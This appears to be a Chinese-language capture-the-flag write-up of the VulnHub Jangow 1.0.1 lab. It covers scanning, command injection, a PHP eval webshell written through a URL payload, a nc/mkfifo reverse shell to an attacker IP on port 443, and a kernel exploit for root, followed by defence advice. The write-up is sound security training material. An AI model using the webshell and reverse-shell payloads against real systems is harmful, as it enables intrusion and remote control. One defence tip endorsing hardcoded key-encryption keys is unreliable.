靶场地址：https://www.vulnhub.com/entry/jangow-101,754/

靶场IP：192.168.160.215

信息收集
使用Nmap对目标进行扫描
Nmap -sV -O -p- 192.168.160.215

经过漫长的等待扫描完成，该靶标开启了21、80两个端口，21端口运行服务为ftp，其版本为 vsftpd 3.0.3 ，80端口运行服务为Apache httpd 2.4.18，系统信息为 Linux 3.X|4.X

首先呢，我们访问80端口看有什么发现

可以看到这是一个目录遍历，有一个site目录，操作系统为Ubuntu，点击site目录

跳转到一个Web页面，页面右上角有三个模块，点击之后就是当前页面的下面部分，但是点击Buscar模块页面出现空白，但是出现如下链接
http://192.168.160.215/site/busque.php?buscar=

可以看到buscar未被赋值，猜测应该是代码执行或者是命令执行漏洞，那么就尝试一下输入命令看有无返回信息。

经过尝试发现可以进行命令执行。那么好我们姑且先暂时放下这块，我们一般看到这种URL可能会想到的操作就是扫描一下子它的目录，看有啥好东西。

发现有一个 .backup、site目录，我们就site目录继续深入扫描

通过两个目录扫描，共发现存在 .backup、/site/assets/、/site/css/、/site/index.html、/site/js、/site/wordpress/ 这几个目录和文件。

那我们就逐个去看一下
访问 .backup文件显示的是数据库的连接账号和密码

通过这里的代码可知一些信息就是当前这个网站采用的可能是php+mysql，里面存在连接数据库的账密，但是在扫描的时候并没有看到数据库端口，猜测应该是对外关闭了。

http://192.168.160.215/site/assets/ 介个是一个目录遍历，都是一些图片，没发现啥有用的信息。

http://192.168.160.215/site/css/styles.css 这里面都是前端的一些源码类似的，没用

http://192.168.160.215/site/wordpress/ 这个页面貌似与主页面一样的，没有啥可利用信息。

在信息收集阶段我们得到的有用的信息是，一个.backup里面存放着链接mysql的数据库账号密码，还有一个链接可以执行命令的。

漏洞利用

在信息收集阶段我们通过探测发现开放着除了80，还有一个21端口，那么对于ftp 21端口我们也是可以尝试渗透的，攻击的方法就是对21端口爆破FTP的密码，但是感觉希望不大。

但是突然想到这个靶场他就开着两个端口，那么我们刚才从80端口拿到一些敏感信息，那会不会在21上也会有用处呢，带着好奇心我们来尝试一下。


成功连接！

尝试上传马，但是FTP做了限制上传的限制。

既然上传不了，那就在寻找其他办法。

在翻阅目录时发现wordpress目录下的config.php文件找到了第二个用户和密码，和一个连接数据库的php脚本。

那么就尝试访问一下这个地址链接，访问地址测试数据库的连接失败了，应该是账密有问题。

在家目录下找到账户jangow01的flag：

现在找到了一个flag，但是呢！目前还没办法GetShell，思来想去，对了，我们刚刚有一个可以执行命令的链接，从哪里可不可以拿到WebShell呢，废话不多说，直接干！！！

执行命令看看当前目录有啥，路径是啥


那就尝试直接使用命令写入WebShell
http://192.168.160.215/site/busque.php?buscar=echo%20%27%3C?php%20@eval($_REQUEST[%27pass%27]);%20echo%20%27OK%27;?%3E%27%20%3E%20shell.php
使用命令ls查看一下是否写入成功

访问shell.php测试一下

使用蚁剑进行连接

查看当前权限

www-data权限，并开着3306数据库端口。尝试寻找账号密码进行Mysql UDF提权，但无果。

反弹Shell

查看靶机支持反弹Shell的方法

可以看到有bash、python、php、exec、perl

反弹Shell可以参考：https://forum.ywhack.com/shell.php

(反弹Shell弄了很久，尝试了各种反弹Shell都没有成功)

猜测可能是防火墙做了端口的限制；这里做个验证，在前面的信息收集中，靶机开启了22端口但是我们从外部没有扫描到；可以通过查看ssh的配置文件看看是否修改了端口；

这里看到配置文配置的端口还是22端口，可以确定是防火墙做了一些限制，于是就尝试了常用的端口，发现在443端口就可以成功反弹，使用nc进行反弹：
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.160.158 443 >/tmp/f

成功接收到返回的Shell。

权限提升

查看系统版本
lsb_release -a ; uname -a

发现系统内核版本4.4 Ubuntu版本为16.04.1，通过在ExploitDB查找发现该版本存在有本地提权漏洞，也可以使用MSF搜索。

ExploitDB网址：https://www.exploit-db.com/

这里可以使用python调用本地的终端：

python -c 'import pty;pty.spawn("/bin/bash")'

这里使用su jangow01切换到jangow01用户下

将exp.c文件通过蚁剑上传至/tmp目录下，通过gcc将其编译可执行文件，修改可执行文件权限为777，使用./执行文件，获取root权限！！！


Flag在root目录下

到此渗透结束！！！

总结

过程回顾

本篇文章主要jangow1.0.1靶场渗透的过程进行后续分析，首先是通过Nmap对靶机进行端口和服务等信息的探测，发现目标存在Web服务和FTP服务，然后通过对目标网站进行扫描找到目标网站存在的备份文件，和其他网站路径，发现其带参数的URL，测试发现了命令执行漏洞，还通过备份文件中包含的用户和密码，登录上目标的FTP服务(但是没有上传权限)。

然后通过命令执行写入WebShell，然后通过分析发现靶机配置了防火墙规则只能通过固定的端口443向外传输数据，接着nc反弹Shell，使用python调用本地终端，最后使用Ubuntu 16.04本地提权漏洞进行权限提升，并获取了ROOT权限。

防御建议

1、敏感信息泄露：

1） 禁止在代码中存储敏感数据:禁止在代码中存储如数据库连接字符串、口令和密钥之类的敏感数据，这样容易导致泄密。用于加密密钥的密钥可以硬编码在代码中。
2） 禁止密钥或账号的口令以明文形式存储在数据库或者文件中:密钥或账号口令必须经过加密存储。

例外情况:如果Web容器的配置文件中只能以明文方式配置连接数据库的用户名和口令，那么就不用强制遵循该规则，将该配置文件的属性改为只有属主可读写。

2、命令执行漏洞:

1. 尽量不去执行外部的应用程序或命令。
2. 使用自定义函数或函数库实现外部应用程序或命令的功能。
3. 在执行system、eval等命令执行功能的函数前，校验参数内容。

使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义，如单引号(’)会被转义为(\’), 双引号(”)会被转义为(\”),分号(;)会被转义为(😉,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断，实现防范命令注入攻击的目的。

使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为on,然后将允许执行的文件放入一下目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。

3、目录浏览

Apache中关闭目录浏览功能:打开Apache配置文件httpd.conf,查找 “Options IndexesFollowSymLinks” ,修改为 “Options -Indexes” (减号表示取消),保存退出,重启Apache。

4、Ubuntu 16.04本地提权漏洞:即使更新系统版本,下载安装最新补丁。

5、 加装WAF,防火墙等安全设备。

6、使用最小权限原则,严格控制用户访问权限。